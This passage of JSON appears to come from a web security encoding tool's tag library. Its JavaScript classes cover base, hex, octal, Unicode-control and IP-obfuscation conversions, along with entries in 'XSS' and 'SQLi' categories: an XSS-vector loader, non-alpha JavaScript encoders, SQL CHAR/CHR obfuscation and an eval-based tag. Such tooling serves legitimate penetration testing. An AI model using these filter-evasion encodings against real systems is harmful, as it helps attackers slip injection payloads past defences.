{\n return [...new Set(input.split(\",\"))];\n }\n}\n","category":"Array","description":"This tags splits on comma and removes any duplicates.","viewed":40,"installed":0,"tagId":47,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-07T21:46:06.656Z","updatedAt":"$D2025-05-25T17:29:43.740Z"},{"id":"67051e043de8e80b65f582bf","name":"jsAsync","arguments":[],"code":"class jsAsync {\r\n async encode(input) {\r\n const code = `\r\n async function runAsync() {\r\n return await ${input};\r\n }\r\n runAsync();\r\n `;\r\n\r\n try {\r\n return await (async () => eval(code))();\r\n } catch (e) {\r\n return String(e);\r\n }\r\n }\r\n}\r\n","category":"Convert","description":"This tag executes JavaScript asynchronously","viewed":37,"installed":0,"tagId":48,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-08T11:56:52.627Z","updatedAt":"$D2025-05-25T17:29:45.168Z"},{"id":"67059894a5a3e571105dd327","name":"hexSpace","arguments":[],"code":"class hexSpace {\r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => chr.codePointAt(0).toString(16).padStart(2, \"0\"))\r\n .join(\" \");\r\n }\r\n\r\n decode(input) {\r\n return input\r\n .split(\" \")\r\n .map((c) => String.fromCodePoint(parseInt(c, 16)))\r\n .join(\"\");\r\n }\r\n startsWith(input){\r\n return /^([a-f0-9]{2}\\s?)+/i.exec(input)\r\n}\r\n \r\n matches(input){\r\n return /^([a-f0-9]{2}\\s?)+$/i.exec(input)\r\n}\r\n}\r\n","category":"Convert","description":"Converts hex with spaces","viewed":34,"installed":0,"tagId":49,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-08T20:39:48.397Z","updatedAt":"$D2026-02-02T20:21:44.961Z"},{"id":"67066d8615dea1c6e60b932d","name":"octal","arguments":[],"code":"class octal {\r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) =>\r\n chr.codePointAt() <= 0xff ? \"\\\\\" + chr.codePointAt().toString(8) : chr,\r\n )\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/\\\\[0-3]?[0-7]{1,2}/gi, (c) =>\r\n String.fromCodePoint(parseInt(c.replaceAll(/\\\\/gi, \"\"), 8)),\r\n );\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:(?:\\\\[0-3]?[0-7]{1,2}){4,})/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:(?:\\\\[0-3]?[0-7]{1,2}){4,})$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag encodes and decodes octal escapes","viewed":33,"installed":0,"tagId":50,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-09T11:48:22.830Z","updatedAt":"$D2026-02-02T20:22:26.092Z"},{"id":"6706e580db56572bc9d4ce17","name":"paragraphSeparator","arguments":[],"code":"class paragraphSeparator {\r\n encode(input) {\r\n return String.fromCodePoint(0x2029);\r\n }\r\n}\r\n","category":"String","description":"This produces a paragraph separator often useful for creating new lines.","viewed":31,"installed":0,"tagId":51,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-09T20:20:16.603Z","updatedAt":"$D2025-05-22T12:54:18.699Z"},{"id":"6706e5a7db56572bc9d4ce19","name":"lineSeparator","arguments":[],"code":"class lineSeparator {\r\n encode(input) {\r\n return String.fromCodePoint(0x2028);\r\n }\r\n}\r\n","category":"String","description":"This produces a line separator often useful for creating new lines.","viewed":31,"installed":0,"tagId":52,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-09T20:20:55.176Z","updatedAt":"$D2025-05-22T12:54:18.723Z"},{"id":"6706e700fc3a8cac4fb5b696","name":"rightToLeftOverride","arguments":[],"code":"class rightToLeftOverride {\r\n encode(input) {\r\n return String.fromCodePoint(0x202E);\r\n }\r\n}\r\n","category":"String","description":"This tag generates a right to left override character that can reverse text","viewed":29,"installed":0,"tagId":53,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-09T20:26:40.459Z","updatedAt":"$D2025-05-22T12:54:18.947Z"},{"id":"6706e7629247ddee8310abd7","name":"leftToRightOverride","arguments":[],"code":"class leftToRightOverride {\r\n encode(input) {\r\n return String.fromCodePoint(0x202D);\r\n }\r\n}\r\n","category":"String","description":"This tag generates a left to right override character that can stop the effects of right to left override","viewed":29,"installed":0,"tagId":54,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-09T20:28:18.141Z","updatedAt":"$D2025-05-22T12:54:18.960Z"},{"id":"6707bce806b1e9b82cd225e4","name":"base32","arguments":[],"code":"$17","category":"Convert","description":"This tag encodes and decodes base32","viewed":31,"installed":0,"tagId":55,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:39:20.222Z","updatedAt":"$D2026-02-02T20:23:23.174Z"},{"id":"6707bdb054c1195b5d3dc455","name":"base58","arguments":[],"code":"$18","category":"Convert","description":"This tag decodes and encodes base58","viewed":31,"installed":0,"tagId":56,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:42:40.786Z","updatedAt":"$D2026-02-02T20:24:06.205Z"},{"id":"6707becfca7bef6d3bf12cb6","name":"base85","arguments":[],"code":"$19","category":"Convert","description":"This tag encodes and decodes base85 encoding","viewed":33,"installed":0,"tagId":57,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:47:27.386Z","updatedAt":"$D2026-02-02T20:25:36.228Z"},{"id":"6707c00254c1195b5d3dc457","name":"base62","arguments":[],"code":"$1a","category":"Convert","description":"This does base62 encoding and decoding","viewed":31,"installed":0,"tagId":58,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:52:34.995Z","updatedAt":"$D2026-02-02T20:26:23.296Z"},{"id":"6707c09d54c1195b5d3dc459","name":"base91","arguments":[],"code":"$1b","category":"Convert","description":"This tag converts base91 data","viewed":32,"installed":0,"tagId":59,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:55:09.717Z","updatedAt":"$D2026-02-02T20:27:08.320Z"},{"id":"6707c10b54c1195b5d3dc45b","name":"base64Url","arguments":[],"code":"class base64Url {\r\n encode(input) {\r\n return btoa(input)\r\n .replace(/\\+/g, \"-\")\r\n .replace(/\\//g, \"_\")\r\n .replace(/=+$/, \"\");\r\n }\r\n\r\n decode(input) {\r\n input = input.replace(/-/g, \"+\").replace(/_/g, \"/\");\r\n const pad = input.length % 4 === 0 ? 0 : 4 - (input.length % 4);\r\n input += \"=\".repeat(pad);\r\n return atob(input);\r\n }\r\n\r\n startsWith(input) {\r\n const base64urlPrefixRegex = /^(?:[A-Za-z0-9_-]{4})*(?:[A-Za-z0-9_-]{0,3})/;\r\n return base64urlPrefixRegex.exec(input);\r\n }\r\n\r\n matches(input) {\r\n const base64urlRegex =\r\n /^(?:[A-Za-z0-9_-]{4})*(?:[A-Za-z0-9_-]{2}==|[A-Za-z0-9_-]{3}=)?$/;\r\n return base64urlRegex.test(input);\r\n }\r\n}\r\n","category":"Convert","description":"This performs base64 URL encoding often used with JWT","viewed":32,"installed":0,"tagId":60,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:56:59.740Z","updatedAt":"$D2026-02-04T21:11:56.479Z"},{"id":"6707c1844cc9f81e24ec58f5","name":"zbase32","arguments":[],"code":"$1c","category":"Convert","description":"This performs zbase32 encoding","viewed":29,"installed":0,"tagId":61,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T11:59:00.602Z","updatedAt":"$D2026-02-02T20:28:33.650Z"},{"id":"6708436b42c90608859cf9b7","name":"zeroWidthSpace","arguments":[],"code":"class zeroWidthSpace {\r\n encode(input) {\r\n return String.fromCodePoint(0x200b);\r\n }\r\n}\r\n","category":"String","description":"This tag generates a zero width space character","viewed":30,"installed":0,"tagId":62,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:13:15.109Z","updatedAt":"$D2025-05-22T12:54:20.022Z"},{"id":"670843b142c90608859cf9b9","name":"zeroWidthNonJoiner","arguments":[],"code":"class zeroWidthNonJoiner {\r\n encode(input) {\r\n return String.fromCodePoint(0x200c);\r\n }\r\n}\r\n","category":"String","description":"This tag creates a zeroWidthNonJoiner character","viewed":31,"installed":0,"tagId":63,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:14:25.157Z","updatedAt":"$D2025-05-22T12:54:20.028Z"},{"id":"670843f442c90608859cf9bb","name":"zeroWidthJoiner","arguments":[],"code":"class zeroWidthJoiner {\r\n encode(input) {\r\n return String.fromCodePoint(0x200d);\r\n }\r\n}\r\n","category":"String","description":"This tag generates a zeroWidthJoiner character","viewed":29,"installed":0,"tagId":64,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:15:32.948Z","updatedAt":"$D2025-05-22T12:54:20.021Z"},{"id":"6708442b42c90608859cf9bd","name":"zeroWidthNoBreakSpace","arguments":[],"code":"class zeroWidthNoBreakSpace {\r\n encode(input) {\r\n return String.fromCodePoint(0xfeff);\r\n }\r\n}\r\n","category":"String","description":"This generates a zeroWidthNoBreakSpace characters","viewed":29,"installed":0,"tagId":65,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:16:27.530Z","updatedAt":"$D2025-05-22T12:54:20.054Z"},{"id":"6708448742c90608859cf9bf","name":"wordJoiner","arguments":[],"code":"class wordJoiner {\r\n encode(input) {\r\n return String.fromCodePoint(0x2060);\r\n }\r\n}\r\n","category":"String","description":"This tag generates a wordJoiner character","viewed":28,"installed":0,"tagId":66,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:17:59.165Z","updatedAt":"$D2025-05-22T12:54:20.321Z"},{"id":"670844bc42c90608859cf9c1","name":"invisibleSeparator","arguments":[],"code":"class invisibleSeparator {\r\n encode(input) {\r\n return String.fromCodePoint(0x2063);\r\n }\r\n}","category":"String","description":"This generates a invisibleSeparator character","viewed":28,"installed":0,"tagId":67,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-10T21:18:52.869Z","updatedAt":"$D2025-05-22T12:54:20.321Z"},{"id":"67098c1f42c90608859cf9c3","name":"vectors","arguments":[{"type":"string","help":"This provides the tag name","defaultValue":"*"},{"type":"boolean","help":"Shows vectors with user interaction or not","defaultValue":"false"}],"code":"class vectors {\n encode(input, tagName, requiresInteraction) {\n const output = [];\n for (const [event, obj] of Object.entries(\n hv.variables.xssCheatSheet.events,\n )) {\n obj.tags\n .filter((tagObj) => tagObj.interaction === requiresInteraction)\n .filter((tagObj) =>\n tagName === \"*\" ? true : tagObj.tag === tagName || tagObj.tag === \"*\",\n )\n .forEach((tagObj) => output.push(tagObj.code.replaceAll(\"*\", tagName)));\n }\n return output.join(\"\\n\");\n }\n}\n","category":"XSS","description":"This tag loads vectors from the events part of the XSS cheat sheet.","viewed":35,"installed":0,"tagId":68,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-11T20:35:43.506Z","updatedAt":"$D2025-05-22T12:54:20.317Z"},{"id":"670e54a6398932e34a18ddaa","name":"base","arguments":[{"type":"number","help":"This provides the base to convert from","defaultValue":"10"},{"type":"number","help":"This provides the base to convert to","defaultValue":"16"}],"code":"class base {\r\n encode(input, from, to) {\r\n return input.split(\",\").map((num) => parseInt(num, from).toString(to));\r\n }\r\n}\r\n","category":"Math","description":"This tag convert from one base to another. The first param is the base to convert from and the second param is the base to convert to. It also splits the input with a comma.","viewed":32,"installed":0,"tagId":69,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-15T11:40:22.770Z","updatedAt":"$D2025-05-22T12:54:20.333Z"},{"id":"670eb9ec880572cd7e44cf3d","name":"padStart","arguments":[{"type":"number","help":"This controls the amount of padding","defaultValue":"2"},{"type":"string","help":"This is the padding character","defaultValue":"0"}],"code":"class padStart {\r\n encode(input, len, padCharacter) {\r\n return input\r\n .split(\",\")\r\n .map((chr) => chr.padStart(len, padCharacter))\r\n .join(\",\");\r\n }\r\n}\r\n","category":"String","description":"This tag by default zero pads a string, it also splits on comma to pad multiple strings.","viewed":32,"installed":0,"tagId":70,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-15T18:52:28.926Z","updatedAt":"$D2025-05-22T12:54:20.355Z"},{"id":"670ebddc7863b2c7a9a51480","name":"sort","arguments":[{"type":"string","help":"This provides the sort order","defaultValue":"asc"}],"code":"class sort {\r\n encode(input, order) {\r\n const array = input.split(\",\");\r\n const isNumeric = array.every((item) => /^[\\d.-]+$/.test(item));\r\n if (isNumeric) {\r\n return array.sort((a, b) => (order === \"asc\" ? +a - +b : +b - +a));\r\n } else {\r\n return array.sort((a, b) =>\r\n order === \"asc\"\r\n ? a.toString().localeCompare(b.toString())\r\n : b.toString().localeCompare(a.toString()),\r\n );\r\n }\r\n }\r\n}\r\n","category":"Array","description":"This splits the input with a comma and then sorts the array numerically or by string. The order parameter controls the direction.","viewed":32,"installed":0,"tagId":71,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-15T19:09:16.213Z","updatedAt":"$D2025-05-22T12:54:20.624Z"},{"id":"670ed12014bffe224b016952","name":"xmlToJson","arguments":[],"code":"$1d","category":"XML","description":"This tag traverses the XML and tries to convert it to JSON.","viewed":36,"installed":0,"tagId":72,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-15T20:31:28.265Z","updatedAt":"$D2025-05-22T12:54:20.613Z"},{"id":"670ed33251b85bd12d8cc68d","name":"formatJson","arguments":[],"code":"class formatJson {\r\n encode(input) {\r\n return JSON.stringify(JSON.parse(input), null, 3);\r\n }\r\n}\r\n","category":"Utils","description":"This tag parses the input as JSON then stringifies it and formats it.","viewed":35,"installed":0,"tagId":73,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-15T20:40:18.835Z","updatedAt":"$D2025-05-22T12:54:20.622Z"},{"id":"6710f96480423803a6b85201","name":"hasegawa","arguments":[{"type":"string","help":"This provides symbols to use for the non-alpha code.","defaultValue":"ªÀÁÂÃÄÆÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþ$_"}],"code":"$1e","category":"XSS","description":"This tag recreates the EPIC non-alpha JavaScript that Yosuke Hasegawa discovered on the slackers forum.","viewed":32,"installed":0,"tagId":75,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-17T11:47:48.632Z","updatedAt":"$D2025-05-22T12:54:20.639Z"},{"id":"671142ac30a17cb3de203e34","name":"jsFuck","arguments":[{"type":"boolean","help":"This argument is used to wrap the code with eval","defaultValue":"true"}],"code":"$1f","category":"XSS","description":"This tag encodes the JavaScript input as JSFuck. A technique to generate non-alpha JavaScript first discovered on the sla.ckers forums. The encoder is written by Martin Kleppe.","viewed":35,"installed":0,"tagId":76,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-17T17:00:28.687Z","updatedAt":"$D2025-05-22T12:54:20.661Z"},{"id":"67163892cd875cb20069dfea","name":"shuffle","arguments":[],"code":"class shuffle {\r\n encode(input) {\r\n const array = input.split(\",\");\r\n for (let i = array.length - 1; i > 0; i--) {\r\n const j = Math.floor(Math.random() * (i + 1));\r\n [array[i], array[j]] = [array[j], array[i]];\r\n }\r\n return array.join(\",\");\r\n }\r\n}\r\n","category":"Array","description":"This tag splits the input with a comma then shuffles the array and returns the output as a string.","viewed":33,"installed":0,"tagId":78,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:18:42.766Z","updatedAt":"$D2025-05-22T12:54:21.166Z"},{"id":"67163c6acd875cb20069dfec","name":"lower","arguments":[],"code":"class lower {\r\n encode(input) {\r\n return input.toLowerCase();\r\n }\r\n}\r\n","category":"String","description":"This tag converts the input to lower case","viewed":31,"installed":0,"tagId":79,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:35:06.193Z","updatedAt":"$D2025-05-22T12:54:21.096Z"},{"id":"67163cbfd456cc249574e7be","name":"upper","arguments":[],"code":"class upper {\r\n encode(input) {\r\n return input.toUpperCase();\r\n }\r\n}\r\n","category":"String","description":"This tag converts the input to upper case","viewed":30,"installed":0,"tagId":80,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:36:31.099Z","updatedAt":"$D2025-05-22T12:54:21.166Z"},{"id":"67163d773733fc827a23de07","name":"capitalise","arguments":[],"code":"class capitalise {\r\n encode(input) {\r\n return input\r\n .split(\" \")\r\n .map((item) => item.charAt(0).toUpperCase() + item.slice(1))\r\n .join(\" \");\r\n }\r\n}\r\n","category":"String","description":"This tag splits on spaces then capitalises the first letter of every word.","viewed":44,"installed":0,"tagId":81,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:39:35.699Z","updatedAt":"$D2025-05-22T12:54:21.099Z"},{"id":"671641298e10b7a3266d9f5e","name":"md5","arguments":[],"code":"$20","category":"Hash","description":"This performs a md5 hash of the input","viewed":43,"installed":0,"tagId":82,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:55:21.156Z","updatedAt":"$D2025-05-22T12:54:21.165Z"},{"id":"671641d4beeeb66f4eebcf81","name":"md4","arguments":[],"code":"$21","category":"Hash","description":"Creates a md4 hash of the input","viewed":43,"installed":0,"tagId":83,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T11:58:12.866Z","updatedAt":"$D2025-05-22T12:54:21.340Z"},{"id":"6716ba5639ea2d9c0e5dc5b9","name":"rot13","arguments":[],"code":"class rot13 {\r\n encode(input) {\r\n return input.replace(/[a-zA-Z]/g, (char) => {\r\n const start = char <= \"Z\" ? 65 : 97;\r\n return String.fromCharCode(\r\n ((char.charCodeAt(0) - start + 13) % 26) + start,\r\n );\r\n });\r\n }\r\n}\r\n","category":"Encrypt","description":"This rot13 tag encodes and decodes text by shifting letters 13 positions in the alphabet.","viewed":46,"installed":0,"tagId":84,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T20:32:22.728Z","updatedAt":"$D2025-05-22T12:54:21.364Z"},{"id":"6716bbcb39ea2d9c0e5dc5bb","name":"rot47","arguments":[],"code":"class rot47 {\r\n encode(input) {\r\n return input.replace(/[!-~]/g, (char) => {\r\n return String.fromCharCode(((char.charCodeAt(0) - 33 + 47) % 94) + 33);\r\n });\r\n }\r\n}\r\n","category":"Encrypt","description":"The rot47 tag encodes and decodes text by shifting ASCII characters 47 positions.","viewed":48,"installed":0,"tagId":85,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T20:38:35.801Z","updatedAt":"$D2025-05-22T12:54:21.365Z"},{"id":"6716bdd839ea2d9c0e5dc5bd","name":"xor","arguments":[{"type":"string","help":"This provides the key to use","defaultValue":"key"}],"code":"class xor {\r\n encode(input, key) {\r\n return input\r\n .split(\"\")\r\n .map((char, i) => {\r\n return String.fromCharCode(\r\n char.charCodeAt(0) ^ key.charCodeAt(i % key.length),\r\n );\r\n })\r\n .join(\"\");\r\n }\r\n}\r\n","category":"Encrypt","description":"This xor tag encodes and decodes text using a bitwise XOR operation with a given key.","viewed":70,"installed":0,"tagId":86,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-21T20:47:20.436Z","updatedAt":"$D2025-05-22T12:54:21.348Z"},{"id":"67178e99d2a5549b515b96fa","name":"ip2dword","arguments":[{"type":"number","help":"This provides the number of times to repeat the dword encoding","defaultValue":"1"}],"code":"class ip2dword {\r\n encode(input, repeat) {\r\n const segments = input.split(\".\").map(Number);\r\n let result = 0;\r\n const qty = 256 ** segments.length;\r\n\r\n if (segments.length % 2 === 1) {\r\n for (let i = 0; i < segments.length; i += 3) {\r\n result = result * 256 + segments[i];\r\n if (segments[i + 1] !== undefined)\r\n result = result * 256 + segments[i + 1];\r\n if (segments[i + 2] !== undefined)\r\n result = result * 256 + segments[i + 2];\r\n }\r\n } else {\r\n for (let i = 0; i < segments.length; i += 2) {\r\n if (i % 4 === 2) result *= 256;\r\n result = result * 256 + segments[i];\r\n result = result * 256 + segments[i + 1];\r\n }\r\n }\r\n\r\n return result + qty * repeat;\r\n }\r\n}\r\n","category":"IP","description":"This ip2dword tag converts an IPv4 address (in string format) into a 32-bit number by processing each octet and adjusting based on its position. It optionally multiplies the result by a repetition factor (repeat). ","viewed":78,"installed":0,"tagId":87,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T11:38:01.118Z","updatedAt":"$D2025-05-22T12:54:21.739Z"},{"id":"67178feaf2ab2052e865f487","name":"dword2ip","arguments":[{"type":"number","help":"This provides the repeat factor","defaultValue":"1"}],"code":"class dword2ip {\r\n encode(input, repeat) {\r\n const qty = 256 ** 4;\r\n const actualInput = input - qty * repeat;\r\n\r\n const segments = [];\r\n for (let i = 3; i >= 0; i--) {\r\n segments.push((actualInput >> (i * 8)) & 255);\r\n }\r\n\r\n return segments.join(\".\");\r\n }\r\n}\r\n","category":"IP","description":"This tag converts a 32-bit number back to an IPv4 address. It adjusts for a repeat factor by subtracting a multiple of 256^4 before extracting and converting each byte back to its original octet form.","viewed":86,"installed":0,"tagId":88,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T11:43:38.943Z","updatedAt":"$D2025-05-22T12:54:21.738Z"},{"id":"67179166d5939e3eda43678a","name":"ip2oct","arguments":[],"code":"class ip2oct {\r\n encode(input) {\r\n return input\r\n .split(\".\")\r\n .map((oct) => \"0\" + parseInt(oct).toString(8))\r\n .join(\".\");\r\n }\r\n}\r\n","category":"IP","description":"Converts an IP address into an octal representation of it.","viewed":97,"installed":0,"tagId":89,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T11:49:58.021Z","updatedAt":"$D2025-05-22T12:54:21.742Z"},{"id":"6717919a4d3c914792c89f6d","name":"ip2hex","arguments":[],"code":"class ip2hex {\r\n encode(input) {\r\n return input\r\n .split(\".\")\r\n .map((oct) => \"0x\" + parseInt(oct).toString(16))\r\n .join(\".\");\r\n }\r\n}\r\n","category":"IP","description":"Converts an IP address into an hex representation of it.","viewed":112,"installed":0,"tagId":90,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T11:50:50.953Z","updatedAt":"$D2025-05-22T12:54:21.766Z"},{"id":"6717f0ba3eb3d0e93cc6bd08","name":"hex2ip","arguments":[],"code":"class hex2ip {\r\n encode(input) {\r\n return input\r\n .split(\".\")\r\n .map((hex) => parseInt(hex, 16))\r\n .join(\".\");\r\n }\r\n}\r\n","category":"IP","description":"Converts an hex IP address into an decimal representation of it.","viewed":130,"installed":0,"tagId":91,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T18:36:42.884Z","updatedAt":"$D2025-05-22T12:54:21.765Z"},{"id":"6717f0f83eb3d0e93cc6bd0a","name":"oct2ip","arguments":[],"code":"class oct2ip {\r\n encode(input) {\r\n return input\r\n .split(\".\")\r\n .map((oct) => parseInt(oct, 8))\r\n .join(\".\");\r\n }\r\n}\r\n","category":"IP","description":"Converts an octal IP address into an decimal representation of it.","viewed":133,"installed":0,"tagId":92,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T18:37:44.540Z","updatedAt":"$D2025-05-22T12:54:22.023Z"},{"id":"6717f2a10680282a87f5dd8f","name":"cssEscape","arguments":[{"type":"number","help":"This provides the number of characters to pad","defaultValue":"2"}],"code":"class cssEscape {\r\n encode(input, padding = 2) {\r\n return [...input]\r\n .map((chr) =>\r\n chr.codePointAt(0) <= 0xffffff\r\n ? \"\\\\\" + chr.codePointAt(0).toString(16).padStart(padding, \"0\")\r\n : chr,\r\n )\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/\\\\([a-fA-F0-9]{2,6})/g, ($0, hex) =>\r\n String.fromCodePoint(parseInt(hex, 16)),\r\n );\r\n }\r\n\r\n startsWith(input) {\r\n return /^(?:(?:\\\\[a-fA-F0-9]{2,6}){4,})/.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:(?:\\\\[a-fA-F0-9]{2,6}){4,})$/.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"This tag provides CSS escapes and decoding","viewed":153,"installed":0,"tagId":93,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T18:44:49.398Z","updatedAt":"$D2026-02-02T20:29:06.729Z"},{"id":"6717fabf6b9a4be67a20de07","name":"formatXml","arguments":[{"type":"number","help":"This provides the indent size","defaultValue":"2"}],"code":"$22","category":"XML","description":"This tag formats an XML string by parsing it into a DOM structure, recursively traversing its nodes, and adding appropriate indentation and line breaks for elements, text, attributes, and comments, ensuring readable, structured output.","viewed":171,"installed":0,"tagId":94,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-22T19:19:27.497Z","updatedAt":"$D2025-05-22T12:54:24.962Z"},{"id":"6718dcae2418b11d2a5859ef","name":"sqlHex","arguments":[],"code":"class sqlHex {\r\n encode(input) {\r\n return (\r\n \"0x\" +\r\n input\r\n .split(\"\")\r\n .map((chr) => chr.codePointAt().toString(16).padStart(2, \"0\"))\r\n .join(\"\")\r\n );\r\n }\r\n}\r\n","category":"SQLi","description":"This converts the string into hex prefixed with 0x","viewed":189,"installed":0,"tagId":95,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-23T11:23:26.222Z","updatedAt":"$D2025-05-22T12:54:24.907Z"},{"id":"6718e034021e41ed36638676","name":"sqlChar","arguments":[],"code":"class sqlChar {\r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => `CHAR(${chr.codePointAt()})`)\r\n .join(\",\");\r\n }\r\n decode(input) {\r\n return input\r\n .split(\",\")\r\n .map((chr) =>\r\n chr.replace(/CHAR\$(\\d+)\$/i, ($0, m) => String.fromCodePoint(m)),\r\n )\r\n .join(\"\");\r\n }\r\n \r\n startsWith(input) {\r\n return /^(?:(?:CHAR\$\\d+\$,?)+)/i.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:(?:CHAR\$\\d+\$,?)+)$/i.exec(input);\r\n }\r\n}\r\n","category":"SQLi","description":"This tag converts the input to a character code and wraps it into a CHAR() SQL function","viewed":204,"installed":0,"tagId":96,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-23T11:38:28.429Z","updatedAt":"$D2026-02-02T20:30:13.410Z"},{"id":"6718e2b8f81acdede0f822c6","name":"sqlChr","arguments":[],"code":"class sqlChr {\r\n \r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => `CHR(${chr.codePointAt()})`)\r\n .join(\",\");\r\n }\r\n \r\n decode(input) {\r\n return input\r\n .split(\",\")\r\n .map((chr) =>\r\n chr.replace(/CHR\$(\\d+)\$/i, ($0, m) => String.fromCodePoint(m)),\r\n )\r\n .join(\"\");\r\n }\r\n \r\n startsWith(input) {\r\n return /^(?:(?:CHR\$\\d+\$,?)+)/i.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^(?:(?:CHR\$\\d+\$,?)+)$/i.exec(input);\r\n }\r\n}\r\n","category":"SQLi","description":"This tag converts the input to a character code and wraps it into a CHR() SQL 